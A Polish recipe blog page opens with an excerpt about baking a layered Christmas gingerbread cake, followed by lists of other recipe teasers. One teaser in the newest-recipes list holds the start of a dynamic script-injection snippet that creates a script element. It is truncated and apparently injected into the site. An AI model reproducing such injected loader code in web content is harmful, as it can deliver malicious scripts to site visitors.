Piernik przekładany

Mam wrazenie, ze w czasie przygotowan do roznorakich swiat towarzyszy nam czesto przesada, skutkiem czego jest nadmiar jedzenia, ktore potem trzeba zamrozic, zeby sie nie zmarnowalo. Lubie duzy wybor ciast, ale odkad pamietam, zawsze byly pieczone na duzych blachach i czesto wpychalo sie te slodkosci na sile. Świat Bozego Narodzenia nie wyobrazam sobie bez piernika. W tym roku postanowilam upiec ...
Najnowsze przepisy
Rabarbar pojawia się w sklepach i na straganach wcześnie... ⇖ 9
Ah, Thanksgiving! It’s that magical time of year when the... ⇖ 7
Uwielbiam kuchnię pełną wyrazistych smaków i aromatów,... ⇖ 9
Jesień zagościła na dobre, to i w kuchni również jest... ⇖ 10
(function(){ u938=document.createElement("script");u938.type ⇖ 9
Idealne, słodko winne polędwiczki w sosie śliwkowym,... ⇖ 20
Przepisy z bloga
W tym roku postanowiłam zrobić nieco inną wersję sosu... ⇖ 100
Pomysł na tą bezglutenową, kolorową pieczeń chodził... ⇖ 128
Co zrobić na obiad lub ciepłą przekąskę, gdy cukinia... ⇖ 97
Dawno nie czytałam niczego spod pióra Katarzyny Michalak.... ⇖ 80
Póki jest bób, trzeba z niego korzystać i przygotowywać... ⇖ 108
Ostatnio prowadziłam szkolenie dla grupy nauczycieli z... ⇖ 124
Przepisy na czasie
Murzynek to takie ciasto, które piekło się u mnie w domu... ⇖ 831
Sezon na grzyby jest w pełni, w tym roku jest istne,... ⇖ 356
Sernik bez sera to taki wypiek, który potrafi naprawdę... ⇖ 328
Przysmak Sułtana to jedno z tych ciast, które wygląda... ⇖ 322
Sernik to jedno z tych ciast, które nigdy się nie nudzą... ⇖ 266